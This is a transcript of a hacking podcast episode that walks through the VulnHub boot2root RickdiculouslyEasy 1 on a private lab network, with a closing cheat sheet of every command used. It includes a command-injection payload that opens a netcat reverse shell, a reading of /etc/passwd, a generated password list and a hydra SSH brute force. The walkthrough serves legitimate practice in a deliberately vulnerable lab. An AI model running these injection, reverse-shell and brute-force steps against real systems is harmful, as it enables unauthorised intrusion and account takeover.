Episode_2_RickdiculouslyEasy_1

In this first real episode we take a look at RickdiculouslyEasy 1!

Hello and welcome to episode 2 of the Sudo Social Club. I’m Edward Miro and in this episode we are going to be taking a look at a boot2root from VulnHub called RickdiculouslyEasy 1.

The Sudo Social Club is a podcast and YouTube channel centered around hacking capture the flags, wargames, crypto-challenges and vulnerable VM’s. I will be recording videos of me completing the challenges and also explaining in detail what I’m doing, why I’m doing what I’m doing and as much information as I can fit into each episode. Each week I’ll be picking a vulnerable VM, challenge or CTF to work through with you. Together we will learn about all the techniques, protocols and workflows to hack all the things. I’m also going to maintain a really good reference page on www.sudosocialclub.com with links, a workflow cheat sheet with all the commands I used and a feed of all my past episodes for you to use anytime you need it.

If anyone has any feedback or recommendations on how I can improve the channel please leave a comment or email me at sudosocialclub@protonmail.com. Stay tuned after the main content for the Sudo Social Club crypto challenge of the week for a chance to get invited to our private Discord server!

Thanks for tuning in, now let’s begin:

As I mentioned in the introduction, this episode is a walk through of a boot2root from VulnHub called RickdiculouslyEasy 1. Even though last week’s episode on Metasploitable 2 was a legit demo of vulnerabilities, it is designed to be beyond easy because it’s not a challenge, but a testing platform. I do recommend everyone practices using Metasploitable, but it’s just to make sure all your tools are working and you understand the basics of hacking. From here on out when we look at challenges, they’ll be somewhat harder. That being said RickdiculouslyEasy 1 isn’t crazy hard and it’s fun.

From the VulnHub page:

This is a fedora server vm, created with virtualbox.
It is a very simple Rick and Morty themed boot to root.
There are 130 points worth of flags available (each flag has its points recorded with it), you 	should also get root.
It's designed to be a beginner ctf, if you're new to pen testing, check it out!
https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/
https://www.vulnhub.com/author/luke,562/

As always we start with our housekeeping and prep:

apt-get update
apt-get upgrade
apt-get autoremove

We then check our Kali IP address:

ifconfig

We have an address of 192.168.56.4. Now I’m gonna run netdiscover and see what ARP gives us:

netdiscover -r 192.168.56.0/24

Pretty safe to assume it’s 192.168.56.5, but we are gonna run Nmap also to gives a better picture of the target and network:

nmap -sn 192.168.56.0/24

Now we start digging deeper on our target system:

nmap -sS 192.168.56.5

So here are the results of this scan:

PORT     STATE 	SERVICE
21/tcp   open  	ftp
22/tcp   open  	ssh
80/tcp   open  	http
9090/tcp open  	zeus-admin

I know from my research on this challenge, that this scan isn’t giving up everything available. I’m also gonna run:

nmap -p- -sV 192.168.56.5

And this will take a bit longer so while it’s running, I’m gonna explain the difference of those two scans. So from the Nmap man page explains the -sS option as:

SYN scan is the default and most popular scan option for good reason. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by intrusive firewalls. SYN scan is relatively unobtrusive and stealthy, since it never completes TCP connections. It also works against any compliant TCP stack rather than depending on idiosyncrasies of specific platforms as Nmap's FIN/NULL/Xmas, Maimon and idle scans do. It also allows clear, reliable differentiation between open, closed, and filtered states. 

It’s also the Nmap default so putting the -sS in is unnecessary, but I’ve been doing it to make sure we are fully understanding what’s going on.

For the second scan, the -p- tells Nmap to scan every port from 1 through 65535 and -sV has it probe all open ports and try to determine what services and versions are running. You get way more information this way. The default scan only hits the 1000 most popular.

Now we have much more:

PORT      	STATE 	SERVICE 	VERSION
21/tcp    	open  		ftp     		vsftpd 3.0.3
22/tcp    	open  		ssh?
80/tcp    	open  		http    		Apache httpd 2.4.27 ((Fedora))
9090/tcp 	open  		http    		Cockpit web service
13337/tcp 	open  		unknown
22222/tcp 	open  		ssh     		OpenSSH 7.5 (protocol 2.0)
60000/tcp 	open  		unknown

Let’s first check out those http services running on port 80 and 9090 with our browser and see what’s up:

192.168.56.5:80

So here we have Morty’s Cool Website. Checking the source doesn’t show anything. I’ll also check the robot.txt and now we’re getting somewhere:

They're Robots Morty! It's ok to shoot them! They're just Robots!
/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*

Checking the root_shell.cgi:

--UNDER CONSTRUCTION-- 

Viewing the source:

<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->

Nice little red herring for us. Next the tracertool.cgi: 

MORTY'S MACHINE TRACER MACHINE 
Enter an IP address to trace. 

Let’s see if command injection works. I start by getting netcat listening on my Kali machine:

nc -lvp 4444

Then I inject the following command into the tracer tool:

127.0.0.1; nc -e /bin/sh 192.168.56.4 4444

Awesome, we’re in. Looking around in our reverse shell gives us a few things. This passwords folder has a couple files we can check out. I tried to cat them, but apparently Rick aliased the cat command to output a little ASCII cat for us so instead we’ll pop them into the browser. The first one is a flag:

http://192.168.56.5/passwords/FLAG.txt

FLAG{Yeah d- just don't do it.} - 10 Points	10/130

And the second is funny little webpage:

http://192.168.56.5/passwords/passwords.html

Viewing the source gives us a nice little hint for later:

<!--Password: winter-->

Since we know we can’t cat the passwd file without being trolled I can instead just use grep:

grep '[a-zA-Z0-9]' /etc/passwd

That gets us what we want and the notable accounts are:

RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash

Not hard to imagine which account that password we found before belongs to. Let’s exit this shell and check out the other http service running on port 9090:

https://192.168.56.5:9090/

FLAG {There is no Zeus, in your face!} - 10 Points	20/130

Awesome. 20 points down, 110 to go. Next let’s take a look at SSH and try to use the credentials we found:

ssh Summer@192.168.56.5 -p 22222
winter

Here we find another flag, but of course we can’t cat it like before so again we use grep:

grep '[a-zA-Z0-9]' FLAG.txt

FLAG{Get off the high road Summer!} - 10 Points	   30/130

We are also gonna poke around the /Home/ directory and see what Summer has access to. Morty’s directory has a couple files that I’m gonna snag:

scp -P 22222 Summer@192.168.56.5:/home/Morty/Safe_Password.jpg .
scp -P 22222 Summer@192.168.56.5:/home/Morty/journal.txt.zip .

Looking at the JPG doesn’t give us anything useful, but checking the EXIF using strings does:

strings Safe_Password.jpg 

The Safe Password: File: 
/home/Morty/journal.txt.zip. Password: Meeseek

Now let’s try to unzip and cat that journal.txt:

unzip journal.txt.zip 
cat journal.txt

Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points		50/130

Heading over to Rick’s home directory has a couple interesting folders:

RICKS_SAFE
ThisDoesntContainAnyFlags

Checking in RICKS_SAFE shows his ‘safe’, but Summer doesn’t have execute permissions only read so we can copy it to a tmp folder and check it out:

./safe

Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND 	LINE AAAAAHHAHAGGGGRRGUMENTS!

Oops, forgot the password from the previous flag:

./safe 131333
decrypt: 	FLAG{And Awwwaaaaayyyy we Go!} - 20 Points		70/130

Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a 	script 	to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.�	@

I Google’d “Rick Sanchez Band” and I found it’s “The Flesh Curtains”

I also cheated and looked up how to make a Python script for this:

touch password.py
vim password.py

from string import ascii_uppercase
for c in ascii_uppercase:
	for x in range(0, 10):
  	     	print str(c) + str(x) + "Flesh"
     		print str(c) + str(x) + "Curtains"

python password.py > password.txt
cat password.txt

Then I used hydra to brute force Rick’s SSH password:

hydra -s 22222 -v -V -l RickSanchez -P password.txt -t 16 192.168.56.5 ssh

This took a long time so to save you the wait here is the successful output:

[22222][ssh] host: 192.168.56.5   login: RickSanchez   password: P7Curtains

Now we can login as Rick and see what he has:

ssh RickSanchez@192.168.56.5 -p 22222

I forgot about that folder ThisDoesntContainAnyFlags and it does have a file in it:

NotAFlag.txt

Running grep reveals Rick is not a liar:

grep '[a-zA-Z0-9]' NotAFlag.txt 

hhHHAaaaAAGgGAh. You totally fell for it... Classiiiigihhic.
But seriously this isn't a flag..

Assuming Rick has sudo permissions we can pop over into the interactive root shell and see if there’s anything there:

sudo -i

Yep. FLAG.txt

grep '[a-zA-Z0-9]' FLAG.txt

FLAG: {Ionic Defibrillator} - 30 points		100/130

Now lets go check out those last 3 services we found in our initial scan:

nc 192.168.56.5 13337
	
FLAG:{TheyFoundMyBackDoorMorty}-10Points		110/130

nc 192.168.56.5 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# cat FLAG.txt

FLAG{Flip the pickle Morty!} - 10 Points 		120/130

Back to the browser:

ftp://192.168.56.5/	

FLAG.txt

FLAG{Whoa this is unexpected} - 10 Points		130/130

Well, that’s all 130 points and this challenge is done. I know I learned a few things with this one and hopefully you did too.

If you want attempt this week’s challenge go to www.sudosocialclub.com and click on this week’s episode and scroll to the bottom for the cipher text. If you think you solved it send me an email at sudosocialclub@protonmail.com and I’ll invite you to join our Discord server so you can chat with me and other listeners like yourself.

d95679752134a2d9eb61dbd7b91c4bcc
d95679752134a2d9eb61dbd7b91c4bcc
e358efa489f58062f10dd7316b65649e
0cc175b9c0f1b6a831c399e269772661
b2f5ff47436671b6e533d8dc3614845d
d95679752134a2d9eb61dbd7b91c4bcc
d95679752134a2d9eb61dbd7b91c4bcc
e358efa489f58062f10dd7316b65649e
0cc175b9c0f1b6a831c399e269772661
03c7c0ace395d80182db07ae2c30f034
d95679752134a2d9eb61dbd7b91c4bcc
2db95e8e1a9267b7a1188556b2013b33
d95679752134a2d9eb61dbd7b91c4bcc
d1457b72c3fb323a2671125aef3eab5d

If you like this week’s episode and want to help support this channel please subscribe to the podcast through whatever podcatcher you found me through and please subscribe to the YouTube channel. Links to everything on www.sudosocialclub.com, including transcripts, and if you want to help the channel grow please share on your social media. Once again I’m Edward Miro and you can contact me at sudosocialclub@protonmail.com with any comments, questions, corrections or feedback including ideas for future episodes. Thanks for checking out the Sudo Social Club. Have a great week!

Commands:

apt-get update
apt-get upgrade
apt-get autoremove
ifconfig
netdiscover -r 192.168.56.0/24
nmap -sn 192.168.56.0/24
nmap -sS 192.168.56.5
nmap -p- -sV 192.168.56.5
192.168.56.5:80
192.168.56.5:80/robots.txt
192.168.56.5:80/cgi-bin/root_shell.cgi
192.168.56.5:80/cgi-bin/tracertool.cgi
nc -lvp 4444
127.0.0.1; nc -e /bin/sh 192.168.56.4 4444
http://192.168.56.5/passwords/FLAG.txt
http://192.168.56.5/passwords/passwords.html
grep '[a-zA-Z0-9]' /etc/passwd
https://192.168.56.5:9090/
ssh Summer@192.168.56.5 -p 22222
grep '[a-zA-Z0-9]' FLAG.txt
scp -P 22222 Summer@192.168.56.5:/home/Morty/Safe_Password.jpg .
scp -P 22222 Summer@192.168.56.5:/home/Morty/journal.txt.zip .
strings Safe_Password.jpg 
unzip journal.txt.zip 
cat journal.txt
./safe
./safe 131333
touch password.py
vim password.py
from string import ascii_uppercase
for c in ascii_uppercase:
    for x in range(0, 10):
        print str(c) + str(x) + "Flesh"
        print str(c) + str(x) + "Curtains"
python password.py > password.txt
cat password.txt
hydra -s 22222 -v -V -l RickSanchez -P password.txt -t 16 192.168.56.5 ssh
grep '[a-zA-Z0-9]' NotAFlag.txt 
sudo -i
nc 192.168.56.5 13337
nc 192.168.56.5 60000
ftp://192.168.56.5/
Written on February 28, 2019